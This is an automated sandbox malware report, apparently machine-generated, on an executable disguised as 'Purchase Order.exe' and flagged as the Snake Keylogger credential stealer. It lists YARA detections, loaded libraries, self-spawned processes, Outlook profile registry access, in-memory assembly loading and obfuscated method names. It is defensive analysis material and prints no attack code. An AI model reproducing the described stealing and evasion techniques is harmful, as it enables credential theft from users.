Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dpapi.dll	Jump to behavior

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XxFjHXMucdrtqTOWBP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XxFjHXMucdrtqTOWBP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs	Security API names: _0020.AddAccessRule

Source: 0.2.Purchase Order.exe.50e0000.11.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.2735630.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.2781750.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Purchase Order.exe.273d648.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@4/4

Source: C:\Users\user\Desktop\Purchase Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Mutant created: NULL

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Purchase Order.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Purchase Order.exe, 00000004.00000002.4420689970.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000321F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4422610576.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000322C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Purchase Order.exe	ReversingLabs: Detection: 21%
Source: Purchase Order.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EeBu.pdbSHA256 source: Purchase Order.exe
Source:	Binary string: EeBu.pdb source: Purchase Order.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Purchase Order.exe, FormMainMenu.cs	.Net Code: InitializeComponent
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs	.Net Code: UwvUwCha1w System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs	.Net Code: UwvUwCha1w System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.50c0000.10.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.Purchase Order.exe.50c0000.10.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase Order.exe.272447c.1.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.Purchase Order.exe.272447c.1.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])

Source: Purchase Order.exe

Static PE information: 0xD78ABBA7 [Fri Aug 4 02:10:47 2084 UTC]

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC97E9 push ss; retf	4_2_06CC97EA
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC97F8 push ss; retf	4_2_06CC9896
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC8C51 push cs; retf	4_2_06CC8C52
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC9A4B push ss; retf	4_2_06CC9A4E
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCF0B3 push es; ret	4_2_06CCF0B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC9999 push ss; retf	4_2_06CC999A

Source: Purchase Order.exe

Static PE information: section name: .text entropy: 7.904697572590049

Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, IaqcXs97WBXJngyOcVe.cs	High entropy of concatenated method names: 'zqUrnBUUwQ', 'c71rts6khn', 'Rl1rwjqkdH', 'g1Kr8l0hJy', 'YENrL4bkQr', 'gTjrfyeEGm', 'vlSrAreUqw', 'TKkrMB3ZA9', 'QHArSv78te', 'o6JrV7vJBi'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, ov3QI7o2LQiP9hm7vr.cs	High entropy of concatenated method names: 'DB8TBu7QVY', 'qYKTssZqPU', 'Wvw37J4cF0', 'vHK39XMx9m', 'gfeTN67Vra', 'cd4Ty8tO7m', 'x6UTW71aNS', 'bovTi7kfD9', 'sqsT1IuYhl', 'adeThc7uTr'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, Y4XXcdBh2D3Y2wV0x9.cs	High entropy of concatenated method names: 'FcP3qN5qNI', 'tob35L1yJK', 'XOv3EXgV7e', 'VmX3DHB5Xn', 'mnU3lVILcU', 'hZT3213GIu', 'ViB3bSfVLe', 'xIP3PJXA73', 'rSl3IoDgaK', 'wEQ36p0DhA'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, ywuF0BhOIyhbeWVMWg.cs	High entropy of concatenated method names: 'ToString', 'PxPvNeIakL', 'di1vYXwe9E', 'fuVvXfgBHr', 'GDkvjL3DyL', 'kNVvmrlcR1', 'LstvZEIThp', 'qPIvK9Zu6v', 'qgovp0MT98', 'RjFvdCQVBw'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, KeBha09ksgHQPmF1Kkl.cs	High entropy of concatenated method names: 'v4tFnRBgNj', 'Y0oFtLHmhs', 'XrrFwZnqlM', 'NSN0WhtWHn31qfanBre', 'scom7ltCgRTvQT19IkL', 'wuMVDotbw5CpJUKOKEG', 'pKQc2UtcJYXTBZZTYpr'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, I5pNCkiWrBKvjFFeIg.cs	High entropy of concatenated method names: 'bBZgG5oCOL', 'wdFgyRWuEd', 'qPjgi4Vl6A', 'UICg1bWIlo', 'yUNgY5i5E3', 'zZIgXaVPoe', 'AnIgjPpsMw', 'z1qgmsgrW0', 'ghcgZWYKs9', 'nASgK1nWjy'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, yvFojtKGVoQZfW7OCQ.cs	High entropy of concatenated method names: 'NDl2qJYvaW', 'E7p2EMHpSG', 'rEZ2lPSkVP', 'WRRls1qJs6', 'bcWlzqxoxg', 'S7527QPEvF', 'Ig729ycXku', 'Sb42kVWksg', 'TqU2QVslFC', 'SZT2Ut2cLm'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, dwatSuHMe1qQvliJey.cs	High entropy of concatenated method names: 'o6qlJCYC05', 'J3ml5Fs92h', 'VTXlDkJeAT', 'UECl2SYdS3', 'ltalbQ6Jcj', 'FtqDCWTmTn', 'eOiDoN1R2j', 'IPNDuppopc', 'pBWDBrsfa0', 'iRaDOhY5Rn'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, VolHSssxIRWE0AycLQ.cs	High entropy of concatenated method names: 'RJ5r9IC07i', 'b7ZrQqdTt9', 'C6trUSsnFJ', 'nfIrq4XwJq', 'hbZr5s0PsC', 'OyRrDNQDZG', 'WUhrlNYeU2', 'Nyy3u9JwhX', 'dMv3BCgvlo', 'IUh3O9Ra48'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, YwUR0vWdBmCNu00DFo.cs	High entropy of concatenated method names: 'beV4MAgDPu', 'OyA4S0KfpZ', 'zRI4Hocl7M', 'NZH4YbcQgw', 'T2W4jqQfdw', 'XSw4m9qabx', 'eaN4KdrMo1', 'VM04pReKCq', 'qSF4GJGHR0', 'BpS4NElP8p'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, aOOOxadFB9Bng1Fk99.cs	High entropy of concatenated method names: 'xP72nkJCYZ', 'kuH2tYiVjD', 'Aac2war4CM', 'yan28KtEqd', 'vE52LFsWid', 'QZk2fgFGtx', 'pI62A6WFTo', 'uoK2MijTYX', 'Brm2S5VSbP', 'V6m2VXkeNQ'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XxFjHXMucdrtqTOWBP.cs	High entropy of concatenated method names: 'r6V5i8uMtC', 'FNU51Gf7Qc', 'Hyt5hs8p2m', 'zVx5e4byt7', 'OA15Cqs50d', 'o385o61ALa', 'GKL5uqdONB', 'nWw5BSI9vL', 't1u5OkNGOM', 'TOi5sfCh2x'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, sMWB1oOcSfDcEGsrEo.cs	High entropy of concatenated method names: 'RaL3HypbgQ', 'l5P3YQiR9Z', 'cWb3XSYgle', 'm5m3jZCHEL', 'YOk3irS244', 'pB13mw13Cx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, XtyULeSecluK2WEKkB.cs	High entropy of concatenated method names: 'F4OE8shA3S', 'JYsEfw9fsy', 'wnDEMBME2M', 'MOcESJSlHK', 'KobEgBePNa', 'VK3EvMqSM5', 'PV4ET5ubXT', 'IgHE3PkTkI', 'CSLErGMV6U', 'APOEFYlhEk'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, FOrW3W5UUNYhKWNjPf.cs	High entropy of concatenated method names: 'Dispose', 'SoG9OgMiJh', 'E2fkY0Au3I', 'aLeUURJX9e', 'xs49sXXcdh', 'jD39zY2wV0', 'ProcessDialogKey', 'v9Fk7MWB1o', 'uSfk9DcEGs', 'rEokkoolHS'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, u1ytKukRLLd4g2nvo4.cs	High entropy of concatenated method names: 'nBpwbIIod', 'oHr8ZbU5Y', 'DLqfbmTY2', 'd7CATYFVY', 'XFUSaquiO', 'oO1V4CNPW', 'e0g8jGTqydhN100I9S', 'EVXN6ud1Gs7T9aoLMw', 'UHP3ISZfR', 'MMHFf6CEZ'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, BihELb9QnKSKCOgd75n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VyqFipqdSc', 'AgNF14XJs5', 'wh1FhuE0IP', 'BbZFeFOqOk', 'frsFCf3tPj', 'TPfFofFtpH', 'WbQFuNhQoX'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, adcXZhbMFM4fJQUs1b.cs	High entropy of concatenated method names: 'y6mQJDmITU', 'uHCQq6qZUY', 'f82Q5EMCwH', 'HFpQEq96TP', 'FoNQD8WPLN', 'IfRQlbImO6', 'LZEQ2pyCiG', 'q3AQba9E66', 'EN1QPk5ZVd', 'pBbQIehPAq'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, sbL4qKV2G32ksHUvGX.cs	High entropy of concatenated method names: 'RixDLGKKZw', 'o00DAb2kVT', 'oJtEXJGXo8', 'BhREjmV1c8', 'yf7EmjWpH1', 'S9MEZgvtOc', 'qO1EKXCHhG', 'DnAEpm48jH', 'tLaEdlF00Q', 'qsiEGwFXnq'
Source: 0.2.Purchase Order.exe.6b30000.12.raw.unpack, Vs3SJqUNwpqIpO9ISn.cs	High entropy of concatenated method names: 'ARB92xFjHX', 'Wcd9brtqTO', 'Tec9IluK2W', 'gKk96BFbL4', 'GUv9gGXQwa', 'zSu9vMe1qQ', 'Ov7D2El9bDMG2mVM1h', 'mCBmNTncR8cdd9efA9', 'S5w99BZoaR', 'o2a9QGtnEr'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, IaqcXs97WBXJngyOcVe.cs	High entropy of concatenated method names: 'zqUrnBUUwQ', 'c71rts6khn', 'Rl1rwjqkdH', 'g1Kr8l0hJy', 'YENrL4bkQr', 'gTjrfyeEGm', 'vlSrAreUqw', 'TKkrMB3ZA9', 'QHArSv78te', 'o6JrV7vJBi'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, ov3QI7o2LQiP9hm7vr.cs	High entropy of concatenated method names: 'DB8TBu7QVY', 'qYKTssZqPU', 'Wvw37J4cF0', 'vHK39XMx9m', 'gfeTN67Vra', 'cd4Ty8tO7m', 'x6UTW71aNS', 'bovTi7kfD9', 'sqsT1IuYhl', 'adeThc7uTr'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, Y4XXcdBh2D3Y2wV0x9.cs	High entropy of concatenated method names: 'FcP3qN5qNI', 'tob35L1yJK', 'XOv3EXgV7e', 'VmX3DHB5Xn', 'mnU3lVILcU', 'hZT3213GIu', 'ViB3bSfVLe', 'xIP3PJXA73', 'rSl3IoDgaK', 'wEQ36p0DhA'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, ywuF0BhOIyhbeWVMWg.cs	High entropy of concatenated method names: 'ToString', 'PxPvNeIakL', 'di1vYXwe9E', 'fuVvXfgBHr', 'GDkvjL3DyL', 'kNVvmrlcR1', 'LstvZEIThp', 'qPIvK9Zu6v', 'qgovp0MT98', 'RjFvdCQVBw'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, KeBha09ksgHQPmF1Kkl.cs	High entropy of concatenated method names: 'v4tFnRBgNj', 'Y0oFtLHmhs', 'XrrFwZnqlM', 'NSN0WhtWHn31qfanBre', 'scom7ltCgRTvQT19IkL', 'wuMVDotbw5CpJUKOKEG', 'pKQc2UtcJYXTBZZTYpr'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, I5pNCkiWrBKvjFFeIg.cs	High entropy of concatenated method names: 'bBZgG5oCOL', 'wdFgyRWuEd', 'qPjgi4Vl6A', 'UICg1bWIlo', 'yUNgY5i5E3', 'zZIgXaVPoe', 'AnIgjPpsMw', 'z1qgmsgrW0', 'ghcgZWYKs9', 'nASgK1nWjy'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, yvFojtKGVoQZfW7OCQ.cs	High entropy of concatenated method names: 'NDl2qJYvaW', 'E7p2EMHpSG', 'rEZ2lPSkVP', 'WRRls1qJs6', 'bcWlzqxoxg', 'S7527QPEvF', 'Ig729ycXku', 'Sb42kVWksg', 'TqU2QVslFC', 'SZT2Ut2cLm'
